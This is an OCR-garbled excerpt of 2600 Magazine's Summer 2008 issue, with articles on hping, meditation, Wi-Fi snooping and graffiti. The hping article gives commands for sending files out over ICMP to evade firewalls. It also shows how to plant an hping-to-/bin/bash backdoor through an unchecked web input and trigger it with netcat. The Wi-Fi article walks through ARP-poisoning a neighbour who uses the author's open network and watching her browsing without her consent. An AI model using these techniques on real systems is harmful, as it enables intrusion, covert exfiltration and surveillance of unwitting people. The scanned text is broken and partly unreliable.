SCP, and HTTP(S) are blocked by a firewall;
however, ICMP is allowed out. You can use HPi ng
to transfer the fi le across ICMP. First you wi l l have
to set your target server to be in a l isten state:
[ ro o t @doo rmou s e - 1 # hp i ng 2 J o c a l h o s t
.. - - l i s ten s i gn a t u r e - - s a f e - - i cmp
Wa r n i n g : Una b l e to g u e s s
- the ou tpu t i n t e r f a c e
hp i ng 2 l i s t en mode
[ ma i n ] mem l oc k a l l ( ) : S u c c e s s
Warning : can ' t d i s a b l e memory p a g i ng !
Now that we have someone l isten i ng, let's
transfer the fi le from our source mach i ne:
[ ro o t @doorrnOllse temp l # hp i n g 2 l o c a l ho s t
- - i cmp
.. - d 1 0 0 - - s i g n s i gn a t u r e
- - fi l e . / randoffi . s t u f f
H P ING l oc a l ho s t ( 1 0 1 2 7 . 0 . 0 . 1 ) : i cmp
- mode s e t , 2 8 headers + 1 0 0 data b y t e s
[ ma i n l mem ] ocka l l { ) : Succ e s s
Warn i n g : c an ' t d i s ab l e memory p a g i n g !
l en o 1 2 8 i p " 1 2 7 . 0 . 0 . 1 t t l = 6 4 i d = 1 2 7 7 0 i cmp_
s eq " O
.. r t t = O . 3 rus
l en " 1 2 8 i p " 1 2 7 . 0 . 0 . 1 t t l " 6 4 i d " 1 2 7 7 3 i cmp_
s e q = l
.. r t t = O . l IDS
l en " 1 2 8 i p " 1 2 7 . 0 . 0 . 1 t t l " 6 4 i d" 1 2 7 7 5 i cmp_
s e q = 2
- r t t = O . 2 fi S
l en " 1 2 8 i p " 1 2 7 . 0 . 0 . 1 t t l " 6 4 i d " 1 2 7 7 7 i cmp_
s e q d
.. r t t " 0 . 2 ms
- - - l o c a l ho s t hp i n g s t a t i s t i c - - -
4 packe t s trami t t e d , 4 packe t s
r e c e i ved , 0 % p a c k e t l o s s
round - t r i p m i n / avg /rnax � 0 . 1 / 0 . 2 / 0 . 3 m s
The l isten ing side wi l l then show:
hp i n g 2 l i s t en mode
[ ma i n ] mem l o c k a l l ( ) : S u c c e s s
Warn i ng : c an ' t d i s a b l e memory p a g i n g !
L i n e 1
L i n e 2
L i n e 3
L i n e 4
End o f Impor t a n t F i l e
Looks l i ke we managed to transfer our impor
tant file successful ly! Most people won 't sit and
examine ICMP logs, so you may be able to evade
any firewa l l or I PS in the way.
Let's examine the same scenario, except the
location you are at only allows CUPS outbound
and does deep packet inspection, so you can 't
re-bind your FTP or SFTP server to that port. I
know this is far-fetched, but work with me on this
server on the remote end:
[ ro o t @ doormou s e � ] # n e t s t a t -na
I grep L I S T I grep 6 3 1
tcp 0 0 1 2 7 . 0 . 0 . 1 : 6 3 1
0 . 0 . 0 . 0 : * L I STEN
[ ro o t @doormou s e - ] # hp i n g 2 l o c a l ho s t
- - - l i s ten s i gn a t u r e - - sa f e - p 6 3 1
Wa r n i ng : Unabl e t o g u e s s
the o u tpu t i n t e r f a c e
h p i n g 2 l i s t e n mode
[ ma i n ] mem l o c k a l l ( ) : S u c c e s s
Warn ing : c an ' t d i s a b l e memory pag i n g !
L i ne 1
L i n e 2
L i n e 3
L i n e 4
End o f I mpo r t a n t F i l e
The command to send the fi le over TCP with
no flags looks l i ke th is:
[ ro o t @doo rmou s e t emp ] # hp i n g 2 l oc a l h o s t - p
6 3 1
- - d 1 0 0 - - s i g n s i gn a t ure
- -- fi l e . / random . s tu f f
H P ING l o c a l ho s t ( 1 0 1 2 7 . 0 . 0 . 1 ) : NO P LAGS
are s e t ,
- 4 0 headers + 1 0 0 d a t a b y t e s
[ ma i n ] meml ocka l l ( ) : S u c c e s s
Warn i n g : c an ' t d i s a b l e memo r y pagi n g !
l en " 4 0 i p " 1 2 7 . 0 . 0 . 1 t t l " 6 4 DF i d o O
spor t = 6 3 1 " fla g s = RA seq= O w i n = O r t t = O . O ros
Keep in mind that files transferred th is way are
not encrypted. Although most people won 't be
inspecting packets that much, anyone snoopi ng
on the wire can grab your information.
You can also use HPing as a back door. Get
the fol lowi ng command running on a remote
host, possibly through an insecure website
with an unchecked input variable: hp ing2
-I ethO - - l i s t en s i gna t u r e - p 80 I
/ b i n / b a s h . Then, use netcat to do some
th ing l i ke th is: echo ., s i gn a t u r e r eboo t ; ,.
I nc 3 3 3 . 4 4 4 . 5 5 5 . 6 6 6 8 0 . Anyth ing after
the word "signature" in the echo command
wi l l be processed by the / b i n / b a s h to which
HPi ng's output is being piped, and so the server
reboots. Try th is with your own machi nes:
use s i gn a t u r e touch remo t e . touched . fi l e;
to see that the listener wi l l process what is
being asked of it. You won 't see anyth ing on
the console, but when you stop HPing and do a
qu ick I s , you should now see a new file cal led
remo t e . touched . file in the current directory.
Another use for th is technique is as a "port
knocker." If you don 't want to leave your SSH
daemon up and running a l l the time, set up
HPing on your SSH server. Whenever you want
to start your SSH daemon, use the command
s i gnature s e r v i c e s shd s t a r t ; .
Conclusion
As you can see, HPing is a great tool for both
basic and more advanced applications, and it
can be used i n a variety of different ways. It's
excel lent for helping people to learn how the
IP stack works, especially the TCP flag settings,
and it's great to use in or along with custom
applications. The topics I ' ve covered here i n this
article are just the beginning, and I strongly urge
you to become famil iar with this powerful tool.
one. You can transfer the file to your server over Shouts: magikhOe, Ihab, Exial, /ohnPNP and,
CUPS without interfering with the running CUPS of course, eXoDuS. (YNBABWARLf)
Summer 2008 ------------------- Page 21

by Sai Emrys
2600@saizai.com
AIM, #ca2600: saizai
GPG: OxAFF1 F292
My experience has been that medita
tion is a subject that frequently polarizes
people: some bel ieve credulously in a l l
ki nds of unsupported nonsense, wh i le some
reject everyth i ng wholesale in the name of
skepticism.
However, meditation is a usefu l way
to hack you r m i nd state. Rather than j ust
taking some guru 's preferred version of one
techn ique as the One True Way, you j ust
have to get to know a variety of the tech
niques avai lable, tweak them to work for
you r own world-view and symbol set, and
understand what about them makes them
actual ly work.
I 've tal ked with a fair n umber of people
about this, and one misconception that
comes up often is that "meditation" exclu
sively means "sitting i n a dark, quiet room
in lotus position smel l i ng incense and
th inking about noth i ng." Th is is i ndeed one
method of meditation, known as mushin or
"empty mi nd." It is far from the only one,
though, and it's not necessari ly the best
fi rst approach for everyone, especially not
for people used to multitaski ng, l i ke most
hackers.
Another misconception is that medita
tion is to be treated as someth ing that you
do only i n special short periods of ti me. Th is
impl ies that most of the time you are not in
a meditative m i nd state, but the whole poi nt
of meditation is to change you r everyday
l ife.
There certainly is a place for separate,
focused med itation, but here is one class
of methods I cal l "al l-poi nt" tech niques.
What makes th is class of methods work is
the combination of a very rich env i ronment
and the strategy of not concentrating overly
on any particu lar piece of it. These methods
Page 22
are particu larly wel l-su ited to begi nning
one's med itation experience and to easy,
everyday practice.
1. "Soft eyes"
Th is is a relatively common technique i n
martial arts.
I nstead of focusing on the eyes or hands
of the person you are tal k i ng with (or trying
to disarm), aim you r eyes towards the neck
area and keep a soft focus, both menta l ly
and l iterally.
A good way to check this technique is to
ask yourself a series of questions:
• Where is their right hand and what
are they holdi ng?
• What is in thei r pockets? (Pants, chest,
u nder-arm holster, buttocks. . .)
• How tense are the muscles around
and above thei r eyes? Shou lders?
Neck?
• How fast are they breath i ng?
• How are they about to move?
• Who and what is nearby? Where is
the nearest exit?
The way to tel l whether you ' re doi ng th is
right is to see if you can answer a l l of these
questions with only m i n imal, if any, move
ment of you r eyes and attention; you shou ld
be able to see a l l of it simultaneously.
Th is is not an exclusively martial tech
n ique, though it's certainly usefu l for that;
try j ust doi ng it with everyone you see.
The point is to be able to notice as much
as possible, without telegraph ing what you
are looking at and without havi ng you r
attention excl usively focused on o n e thi ng.
Magicians and fighters both l i ke it when
they can use misdi rection to make you not
notice thi ngs which are with i n you r sight.
2. Really enjoying nature
Go somewhere you ' l l find beautifu l . I ' l l
use h i l ls a s a n example si nce that's what I
most enjoy, but anyth ing vibrant w i l l work.
Normally, when most people go to
2600 Magazine

"enjoy natu re," they either barely notice it
at a l l because they ' re distracted by equ i p
ment, thei r l atest argument, p l a n n i ng the
next day's work, etc.; they notice one spot
l ighted bit at a ti me; or they notice only a
very vague ambiance.
Instead, try to i ndividua l ly see every
thing in deta i l .
A n easy way to d o th is i s to start by
l i m iting you r attention to two thi ngs; for
example, feel i ng wind on you r ski n and
seeing the clouds move. See as much deta i l
a s you can i n those two thi ngs. Then add
a th i rd, such as the feel of sunl ight or the
movement of a patch of grass nearby.
The key l ies i n adding more thi ngs to
your attention simu ltaneously without
losi ng detai l in the previously perceived
ones. Th is can very quickly become over
whelmi ng; the amount of i nformation i n
any natu ral scene is extremely dense. Even
a sma l l patch of grass wi l l have enough
movement and deta i l in it to swamp you r
mu ltithreadi ng.
Fortunately, th is is a learnable ski l l .
With practice, you ' l l find that you r effective
threadcount and buffer size go up.
As a nice bonus, the more you can really
notice, the more enjoyable it is.
3. Individuals in crowds
What did you notice the last time you
wal ked down the street?
It's i nteresting that the amount you
relate to people as individuals tends to be
i nversely related to the number of people
present. Crowds gai n a separate character
of their own : it's easier to simply i nterpret
them as a mass. Th is is also true in reverse;
being a member of a crowd makes one less
apt to empath ize with others as i ndividuals.
Look up the case of Kitty Genovese for one
sad example.
Next time you are out, try to notice
faces, body posture, and the distances
people stand from each other, rather than
glazing over. Don 't attach too much to each
personal drama; j ust notice, recognize, and
keep movi ng.
The goal for this is to increase the scope
of thi ngs which you can take in consciously,
making a "mere" wal k down the street a
somewhat more al ive experience. For more
on recogn izing facial emotions, I h ighly
recommend the work of Paul Ekman, and
for more on the significance of proxi m ity
i n human i nteraction, I recommend The
Hidden Dimension and The Silent Language,
both by Edward T. H a l l .
Conclusion
There are many other situations in which
you can practice th is " a l l -poi nt" tech nique:
wh i l e playi ng RTSs and other games with
lots of thi ngs happen ing at once; wh i l e
l isten i ng t o complex m u lti-part music
such as Rachman i noff, Bach, or Godspeed
You ! Black Emperor; wh i le notic i ng a l l
the background sounds wherever you a re,
i nc l uding computer fans, hard drive clicks,
traffic, your own breath i ng, radios, neigh
bors, and so on; or wh i l e experiencing any
envi ronment.
The pu rpose of this class of techniques
is to learn to be able to deal with h igh ly
mu ltithreaded, content-rich, real-time situ
ations i n a serene manner, so you can not
only experience as much of these situations
as possible but also do so without being
overwhel med. Th is is a lot l i ke the eventual
purpose of traditional empty-m i nd medita
tion; it's just a different approach. I 've given
j ust a few of doi ng this. It's up to you to
figure out one that ' l l be effective for you i n
you r dai ly l ife. The more that you can i nte
grate th is way of i nteracti ng with the world
as a dai ly habit, the more effective it' l l be at
shifting you r base l i ne m i nd state.
If you have any feedback on this or are
i nterested i n seeing more, please contact
me. I ' m worki ng on a book tentatively enti
tled A Hacker's Guide to Meditation: Prac
tical Recipes Without the Dogma, which
aims to be a complete guide to all known
classes of effective mediation techniques
of which th is article discusses just one
from a pragmatic, open-source perspec
tive. Th is i ncl udes tech n iques traditional ly
taught as med itation, psychotherapy, and
more. If you find th is usefu l, or if you have a
technique or variant I m ight not have heard
of, I 'd l i ke to know.
Happy m i nd-hacking!
Sai Emrys is a recent graduate of
UC Berkeley in cognitive science, looking
to do doctoral work in the neuroscience
of empathy. Other interests include
running the Language Creation Conference
(conlangs . berke l ey . edu), interpreting
music in American Sign Language (YouTube
saizai), coding in Ruby on Rails, and
consulting on international business.
Summer2008 ------------------- Page 23

�D O c::J
w D D GJ
� D O��D C9
Q D D w c=7��
DD D D � D CJ
[] �D DQ DO
by Uriah C.
I enjoy leav i n g my wireless access poi nt
ava i l able for others to con n ect to and use the
I nternet. There i s one catch, however: I get to
p l ay and monitor the traffic whenever I want
to. In th i s artic l e, I w i l l describe a pasti me
that i s fu n and reveal i ng of your neighbors.
I recently fou n d a new host on my network
to p l ay with. New friends are fu n ! I frequently
use EtherApe to q u ickly monitor my n etwork
traffic, and I fou n d a new computer name
on my network. Know i ng that th is person
was on my network, I fired up n ma p to do
a q u ick p i n g sweep to confirm my new
friend. My new friend ' s computer name was
her rea l n ame, and I cou l d see that she had
the IP address of 192 .168.1.104. The fam i l y
computer was on 192.168.1.103, my laptop
was on 192 .168.1.101, and the access poi nt
was on 192 .168.1.1.
S i nce I had a new friend to p l ay with, I
decided to view the traffic that was goi n g
through. O f course I cou l d do that with
EtherApe, but I wanted more then j u st I P
addresses a n d U R Ls. Besides, I was itch i ng
to use the program webspy for a l ittl e bit.
Before I go i nto the fu n too m uch, l et
me expl a i n what webspy is. Webspy i s a
program that i s part of Doug Song' s dsniff
s u ite. These tool s are designed to penetra
tion test your n etwork, and, i n my case, h ave
fu n with those o n my n etwork. I m u st stress
that th i s shou l d o n l y be done on your own
network or on one that you h ave been given
permission to preform such tests. N ow that
the l egal stuff is out of the way, l et's get on
with the fun .
The fi rst th i ng I have to do i s to A R P poison
the host and the gateway. Th is way, the traffic
w i l l be routed to my computer. Th i s is done
by open ing two term inal wi ndows.
In the fi rst term i nal, type:
# arpspoo f - i eth1 -t
� 1 9 2 .1 68.1.1 1 9 2 . 1 68.1.1 0 4
I n the second term i n a l , type:
# arp spoo f -i eth1 - t
� 1 9 2 . 1 6 8 . 1 . 1 0 4 1 9 2 . 1 6 8 . 1 . 1
The n , I n eed to make s ure that I am
forward i n g traffic to the proper l ocatio n s,
so I u se fra grouter. I n a th ird term i n a l ,
type:
# fragrouter -i e th 1 -B1
N o w l et ' s see w h at th i s does. The
first arp spoo f c omm a n d sends forged
arp i n formatio n over the i nterface (- i)
e t h 1 to the target ( - t) 192 .168.1.1
that my computer is 192 .168.1.104,
w h i l e the secon d termi n a l tel ls the target
192 .168 .1.104 that my computer i s
192 .168.1.1. M ea n w h i le, fra grouter sends
the broadcast a d dress ( - B1) a l l traffic that
h a s come in, so there i s n o i nterruption of
serv ice.
N ow, it's time for the l a st few steps. I
n eed to r u n w ebspy a n d open a browser.
The n , I c a n h ave the fu n of see i n g w hatever
someon e e l se sees. So, I wou l d open u p
two more term i na l s . I n the fourth termi n a l ,
type:
# webspy -i e th 1 1 9 2 . 1 6 8 . 1 . 1 0 4
And, fi n a l l y, i n the fifth term i n a l , type:
# fire fox &
N ow, F irefox opens u p, a n d I get to see
the websites that my new friend opens up
in real ti me. I ' ve only seen one problem:
if an ad pops up on a separate page from
the rest of a website, it' l l be shown sepa
rately from the rest of the origi nal site. So,
if my friend goes to MySpace, then I see
MySpace, but it quickly flashes over to
show j ust the a d without the rest of the
site. I h ave my browser set to open these
ads in d ifferent tabs, so I can see the page
and the ad.
You never know what kind
of sites others may visit, so you
shou ld do this with discretion
especially if the kids are run n i ng around
the house and the material com ing up is
questionable.
Page 24 ------------------ 2600 Magazine

. A ��/1 4T
��
by scOut64
scOut64@yahoo.ca
I find that one of my longest-run n i ng
fasci nations, computer hacki ng, has a lot
to do with my greatest passion and hobby,
graffiti a rt. These are two very controversial
subjects, and discussing them can usua l ly
generate a great response, depending on who
you ask. Th is is not a how-to article by any
means, but rather a way to shed some l ight
on the s i m i larities between two of my favorite
pasti mes. B ut I ' l l sti l l include the standard
d i sclaimer that getting caught participating
i n either of these activities m ight get you in
trouble.
The fi rst thing I can fi nd these two subjects
have in common is the reaction that you get
when you tel l someone that you do one or the
other. If you tel l someone you ' re a computer
hacker, you can usual l y expect confused or
wary looks. People assume that you 've done
shady thi ngs before, and they approach
conversation choosing thei r words carefu l ly,
assum i ng that you m ight take some of the
i nformation and use it agai n st them. They
m ight not be aware that the hacking you do
m ight be completely l ega l . You m ight be a
pen tester for a security firm, or you j ust m ight
l i ke ru n n i ng wargames on your network with
your friends. It depends on you r defi n ition of
a hacker.
S i m i larly, when you tel l someone
that you ' re a graffiti artist, some peopl e
automatical l y assume that you ' re a vandal .
They th i n k you ' re one o f those stereotypical
guys who tags u p convenience stores at
night, or that you ' re one of the people who
vandal i zed a l l those New York City trains
years ago. They m ight th i n k that you r bedroom
is a mess and that a l l you r schoolbooks are
scribbled on. They may not rea l ize that there
are plenty of l egal areas to tag up and that
what you do fal l s completely with i n the law,
or that you m ight be a graphic design student
whose style is completely d igita l . It depends
on you r defi n ition of graffiti.
A nother s i m i la rity between these two
York City. Yes, it caused a l l ki nds of chaos,
and many people were pena l ized once the
city implemented graffiti laws. L i ke many
great th i ngs, because it was new and brought
change, people didn't l i ke it. Li kewise,
when hacking started becoming extremely
popu lar, there were no laws or govern ing
bod ies to regu l ate what went on. With these
two cu ltures and many others, once the
government felt thi ngs got a l ittle too out of
control, they stepped in and "supervised."
There are a n umber of other s i m i larities
between the two fields:
• Some ways of participati ng in these
activities are i l lega l and ca rry penalties
of various ki nds.
• You need perm ission for partici pation to
be lega l . You can't just Own your friend ' s
bOx a n y more than you c a n tag up h i s
room; you need t o have a n OK from h i m
fi rst.
• There are contests. These are great
for i ntel l ectual sti mulation, learn i ng,
meeting new peopl e, and chal lenging
yourself.
• There a re a lot of graffiti-based themes i n
computer hacking a n d i n video games.
Clan tags and sigs have gotten very, very
cool.
• Depending on who you ask, both can be
considered either vanda l ism and crime
or art and expression.
• An interest i n either field can l ead to a
great career.
• Sometimes, both practices i nvolve going
places you ' re not supposed to go.
• Sometimes, you have to come back to the
same places to fi nish what you started.
There are more s i m i larities, but you get the
idea. G raffiti and hacking have evol ved i nto
disti nct cu ltures; j ust l i ke every cu lture, you
have good peopl e and bad people. People
come and go, but the cu lture su rvives. Legal
or not, these activities wi l l sti l l go on. The
question sti l l remai ns: how w i l l you represent
you r cultu re?
a reas i s l ega l ity. G raffiti writi ng rea l l y came Shouts: Adict, Kiwi,
i nto popu larity i n the 70s and 80s i n New www. worldwideblackbookproject.com
Summer 2008 ------------------- Page 25

2600 v25 n2 (summer 2008)

Recommended

Recommended

More Related Content

What's hot

What's hot (10)

Similar to 2600 v25 n2 (summer 2008)

Similar to 2600 v25 n2 (summer 2008) (20)

More from Felipe Prado

More from Felipe Prado (20)

Recently uploaded

Recently uploaded (20)

2600 v25 n2 (summer 2008)